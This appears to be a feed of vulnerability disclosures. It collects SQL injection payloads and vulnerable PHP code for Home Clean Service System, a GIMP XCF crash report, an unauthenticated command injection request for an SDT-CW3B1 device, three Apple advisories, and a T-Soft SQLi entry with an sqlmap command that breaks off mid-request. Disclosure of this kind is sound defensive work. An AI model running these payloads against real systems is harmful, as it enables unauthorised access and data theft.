In Home Clean Service System 1.0, the password parameter is vulnerable to SQL injection attacks.

**Home Clean Service System****Vendor**

**Description:**

The password parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the password parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.

Status: CRITICAL

\[+\] Payloads:

\--\-
Parameter: MULTIPART email ((custom) POST)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause (NOT)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT COUNT(\*),CONCAT(0x7176716271,(SELECT (ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM (SELECT(SLEEP(5)))kgBM)-- GxTm
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--
\--\-

**Vulnerable code:**

<?php
	session\_start();
	$username = $\_POST\['username'\];
	$password = $\_POST\['password'\];
	if(ISSET($\_POST\['login'\])){
		$conn = new mysqli("localhost","root","","activity") or die(mysqli\_error());
		$query = $conn\->query("SELECT \*FROM \`admin\` WHERE \`username\` = '$username' && \`password\` = '$password'") or die(mysqli\_error());
		$fetch = $query\->fetch\_array();
		$valid = $query\->num\_rows;
			if($valid > 0){
				$\_SESSION\['admin\_id'\] = $fetch\['admin\_id'\];
				header("location:./dashboard.php");
			}else{
				echo "<script>alert('Invalid username or password')</script>";
				echo "<script>window.location = 'index.php'</script>";
			}
		$conn\->close();
	}	

**Reproduce:**

href

**Proof and Exploit:**

href

CVE-2022-30052: CVE-nu11secur1ty/vendors/acetech/2022/Home-Clean-Service-System at main · nu11secur1ty/CVE-nu11secur1ty

GIMP 2.10.30 and 2.99.10 are vulnerable to Buffer Overflow. Through a crafted XCF file, the program will allocate for a huge amount of memory, resulting in insufficient memory or program crash.

**Environment/Versions**

*   GIMP version:2.10.30 and 2.99.10
*   Package: https://download.gimp.org/pub/gimp/v2.10/gimp-2.10.30.tar.bz2

https://download.gimp.org/pub/gimp/v2.99/gimp-2.99.10.tar.bz2

*   Operating System: Ubuntu 21.10

**Description of the bug**

Through a crafted XCF file, the program will allocate for a huge amount of memory, resulting in insufficient memory or program crash. This ASAN report:

\==286446==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xab9e16000 bytes

    #0 0x7f0dfc859a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
    
    #1 0x7f0dfbbd45b0 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x5e5b0)
    
    #2 0x562b862c20a7 in xcf_load_old_paths /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/xcf/xcf-load.c:2724
    
    #3 0x562b862b8ca6 in xcf_load_image_props /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/xcf/xcf-load.c:1055
    
    #4 0x562b862b4586 in xcf_load_image /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/xcf/xcf-load.c:253
    
    #5 0x562b862b267e in xcf_load_stream /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/xcf/xcf.c:315
    
    #6 0x562b862b3630 in xcf_load_invoker /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/xcf/xcf.c:445
    
    #7 0x562b863c33ac in gimp_procedure_real_execute /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/pdb/gimpprocedure.c:213
    
    #8 0x562b863eda5d in gimp_plug_in_procedure_execute /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/plug-in/gimppluginprocedure.c:417
    
    #9 0x562b863c50d0 in gimp_procedure_execute /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/pdb/gimpprocedure.c:431
    
    #10 0x562b863b6325 in gimp_pdb_execute_procedure_by_name_args /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/pdb/gimppdb.c:322
    
    #11 0x562b863b77d0 in gimp_pdb_execute_procedure_by_name /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/pdb/gimppdb.c:451
    
    #12 0x562b866a9998 in file_open_image /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/file/file-open.c:217
    
    #13 0x562b866ab9db in file_open_with_proc_and_display /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/file/file-open.c:522
    
    #14 0x562b866ab2f2 in file_open_with_display /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/file/file-open.c:492
    
    #15 0x562b866acc28 in file_open_from_command_line /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/file/file-open.c:706
    
    #16 0x562b862aa21a in app_run /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/app.c:417
    
    #17 0x562b862b0bc1 in main /home/leung/fuzzing_gimp/test/gimp-2.10.30/app/main.c:656
    
    #18 0x7f0dfb7d7fcf in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58

\==286446==HINT: if you don't care about these errors you may set allocator\_may\_return\_null=1

SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan\_malloc\_linux.cpp:154 in \_\_interceptor\_calloc

\==286446==ABORTING

The reason: Missing size check for num\_points

    //gimp-2.10.30/app/xcf/xcf-load.c:2755
    xcf_read_int32  (info, &num_points, 1);
    ....
    //gimp-2.10.30/app/xcf/xcf-load.c:2780
    if (num_points == 0)
        {
          g_free (name);
          return FALSE;
        }
    
      points = g_new0 (GimpVectorsCompatPoint, num_points);
    

Thread 1 "gimp-console-2." hit Breakpoint 1, xcf\_load\_old\_path (image=0x555555a16860, info=0x7fffffffda90) at xcf-load.c:2787 2787 points = g\_new0 (GimpVectorsCompatPoint, num\_points); (gdb) p/x num\_points $1 = 0x72696400 (gdb) n

(gimp-console-2.10:287033): GLib-ERROR \*\*: 19:00:44.570: ../../../glib/gmem.c:142: failed to allocate 46068228096 bytes

**Reproduction**

Is the bug reproducible? Always Reproduction steps:

1.  download the crafted XCF file:https://github.com/leung-yao/poc/raw/main/poc%20for%20gimp poc\_for\_gimp
2.  compiler gimp 2.10.30 with console, my compiler command：

    PKG_CONFIG_PATH=$PKG_CONFIG_PATH:$HOME/fuzzing_gimp/gegl-0.4.36/  ./configure --disable-gtktest --disable-glibtest --disable-alsatest --disable-nls --without-libtiff --without-libjpeg --without-bzip2 --without-gs --without-libpng --without-libmng --without-libexif --without-aa --without-libxpm --without-webkit --without-librsvg --without-print --without-poppler --without-cairo-pdf --without-gvfs --without-libcurl --without-wmf --without-libjasper --without-alsa --without-gudev --disable-python --enable-gimp-console --without-mac-twain --without-script-fu --without-gudev --without-dbus --disable-mp --without-linux-input --without-xvfb-run --with-gif-compression=none --without-xmc --with-shm=none --enable-debug  --prefix="$HOME/fuzzing_gimp/gimp-2.10.30/install"
    make
    make install

3.  use gimp console
4.  ./gimp-console-2.10 -d -f \[poc file\]

Expected result:normal

Actual result:crash 

**Additional information**

gimp2.99.10 also will crashed by this xcf file.

CVE-2022-30067: GIMP 2.10.30 crashed when allocate large memory (#8120) · Issues · GNOME / GIMP

SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.

    # Exploit Title: SDT-CW3B1 1.1.0 - OS command injection# Date: 2022-05-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: 1.0.0# Vendor home page : http://telesquare.co.kr/# Authentication Required: No# CVE : CVE-2021-46422# Tested on: Windows# HTTP RequestGET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1Host: IP_HEREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: */*Referer: http:// IP_HERE /admin/system_command.shtmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close

SDT-CW3B1 1.1.0 Command Injection

Apple Security Advisory 2022-05-16-7 - Safari 15.5 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-7 Safari 15.5

Safari 15.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213260.

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

Additional recognition

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Safari 15.5 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TcACgkQeC9qKD1p  
rhjYBQ/+LNLAA17vZ+b2uQnKRb9rCwHHZQoSm0rjxXyzcUiZaeloZQ6KTsIidEdr  
JxuqDYjtV8OfSqsgz03z/iK3Ka4AEqM8GNvrX5LhZVqzXnY8K8XHnsi9Z/EfY6nf  
XfRGhPAw/9juxWzLA3ywIu8D9eql1zWEixk82awqNv1v4+Xym4Ff9rEmtSMdJ+9R  
i32E8erdN2GHcR9Dvn2ej/MA/M8YKT6Zxx2Uax4VDJstJdNctabwW1rNwr0Km1ut  
gD9PEWLb3UeKOcBt/2qWHpohWANixft8+p0SJAfU4uEldepi7dN2wHrkuLdGLOEs  
r54mTTbT8G98wYqcOizwfKTwrCb64hfrcgtB32UoSRGzl8wRfkSOdsXTmizow5BK  
YDu18P44K6oxe7X2PtMUEI22/TdJsp8xtgpjqX24GUjcuDb7ZN6zJ7RJijtlsraO  
144GM1L9upX/A5LFBFlmXXTRJ1KTHz1PDw1+WXZTD5FWCPGh6uj0HtdXWOcaaNa5  
uqi7lhc0JxezyKv2QL6/PY8s/811kWfLr1MtNL7nVEMyJX4o3s8yFF1k58KyEzhy  
+VrzGoHQF1y8dhhDGPUrv5fSaCxZ5da2ZDpwBxNZMHLh5sDddvUspGLUTKmQY66R  
FanqabJeytFLB3yfdMJEQ+qDf8N6KIkw1V3HJw4YJQnF8sleWfM=  
=Vm71  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-7

Apple Security Advisory 2022-05-16-6 - tvOS 15.5 addresses bypass, code execution, integer overflow, out of bounds access, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-6 tvOS 15.5

tvOS 15.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213254.

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-22675: an anonymous researcher

AuthKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A local user may be able to enable iCloud Photos without  
authentication  
Description: An authentication issue was addressed with improved  
state management.  
CVE-2022-26724:  Jorge A. Caballero (@DataDrivenMD)

AVEVideoEncoder  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26736: an anonymous researcher  
CVE-2022-26737: an anonymous researcher  
CVE-2022-26738: an anonymous researcher  
CVE-2022-26739: an anonymous researcher  
CVE-2022-26740: an anonymous researcher

DriverKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend  
Micro Zero Day Initiative

IOKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A race condition was addressed with improved locking.  
CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab

IOMobileFrameBuffer  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

IOSurfaceAccelerator  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26771: an anonymous researcher

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An attacker that has already achieved kernel code execution  
may be able to bypass kernel memory mitigations  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

Security  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

Wi-Fi  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TcACgkQeC9qKD1p  
rhiw7BAAy82XZ2+vjnjFB1FrZ7ZnKtM4pz8MMpX4ZTD2ytgkwXi0qnyzBdMe/w4p  
zrpedL4p/RfdDOiM/4kWBtiH62qetiXDcE8tBqN8WTE9rf55cX4jlXrHASohFI2q  
ErkAjo51j2fg8S7a+luyaZWzBUZqlghtzWjtFgaHOQAP5dDf+He92kDerbrIDQw9  
dg0nL4os0VFgWdX0EtFC7umK8iiTFbvtoEbLDLFODWweaJN8LOP/LHe71YzAryKg  
Dh9ItWqVdzkCOKWR8F96NnoBs7c6B4naqQkS4k2F/m6C6ckPb8LI18ss7oiD3eMB  
k7oo7+u1zQFRKmk0XlfH7awxtEHjYjjw3LT8ko9QJ8mEuspxoiwW7n1mINWa7Khp  
YoCe88xR06kfti4h6MJDSN6JpxSnikEyJzR4j4xGL6rWjqCj+XV9ejrt9EgF8BL2  
JZ+Oceoh23m7IqVoMe1Hzjf1X3nsxXJQEg/xxRwHRknAjSNtVJUKhT4/ioOc9pu6  
TROAHYdSO5yRLNUNpj9RlkBeDbXtiWgA2IEg0wcUPzwf3Uzt2Qw9zBFbMb1hPSht  
7zTIOtF4Ub+MD6cFuHbC7hL58pRmA4FzEczLG81BoGGaFOCD2QDt0/ySTFr1M+YD  
g2L2PlZNgxd0zetkTkZbvAwroMUTRSi1GqxAhVeKwbvW4XAN+yc=  
=G3ho  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-6

Apple Security Advisory 2022-05-16-5 - watchOS 8.6 addresses bypass, code execution, integer overflow, out of bounds access, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-5 watchOS 8.6

watchOS 8.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213253.

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-22675: an anonymous researcher

DriverKit  
Available for: Apple Watch Series 3 and later  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: Apple Watch Series 3 and later  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend  
Micro Zero Day Initiative

IOMobileFrameBuffer  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

IOSurfaceAccelerator  
Available for: Apple Watch Series 3 and later  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26771: an anonymous researcher

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An attacker that has already achieved kernel code execution  
may be able to bypass kernel memory mitigations  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: Apple Watch Series 3 and later  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

libxml2  
Available for: Apple Watch Series 3 and later  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

Security  
Available for: Apple Watch Series 3 and later  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

TCC  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

Wi-Fi  
Available for: Apple Watch Series 3 and later  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TYACgkQeC9qKD1p  
rhhgaBAAq/igmuSba0Occu1TcS6aXG50gjUZyJXPu7/UVVWI4icwz+c/ruKquy/w  
XuiT+C2Q6CJIWn2qM+hHrHtgsi3EYI6XxrbgcLgmvGvbwICs9RwHyHc1ztSyurTe  
ys8gJkc+/nZWPKR4dy7JUl8NdjoTWuUyGVE9xOJQeISND5xUoDz2i9d8FKgkZta6  
FoJlIWCDuNq01vgcAfKSZqPX2mEPMnWL47Q6g69PXIs34iBcOrHNesZ/mH/jz5Nz  
aAnisEj9gC0+KERoMSmGoBrYmP7kr/DmVBEwa9cDA0rGfNntgNliQ7wbLxnT8kJG  
rJARAyLPtPsygs7UmnkDaNDkI/a63dIRWwPIKUOQYtKKqwNL5GSoytdk/OhRGjmN  
Hi7k1GmvGiJA7bFI3PIQDSi3YSC1cs9CeyIL2rNUSVmRZ7jHlXxlDQYH1/ad4DU1  
TqVw9Rwg0mlc0tYKUNjChg/uAK1G5OGidxtLRt0FzUaXvPoVLe0/btYeaH6ijfU9  
i1W+xJ8jGgWddP7r1HvNeN6B+WGuIEcla+GNduEV3+AcnxL9h6FP8sAzQuTHQtKC  
AkqUO1G20ieIQHKJPNEIpgLlrCFYVajDfRtB9zGDme6aBZNHxefOWMMxdKfnspj2  
MtFpJ9qPmpnRITjCF5z1RDfqFjXUZvePcRA6rS1Lq4ClgQ575yI=  
=zdvf  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-5

T-Soft E-Commerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# CVE: 2022-28132# Date: 18.02.2022######## Description ###############################################  Step-1: Login as Admin or with privilage user#  Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path#  Step-3: Capture the request save as .txt#  Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'#  Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'##  Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...# ########## Proof of Concept ########################################========>>> REQUEST <<<=========GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; 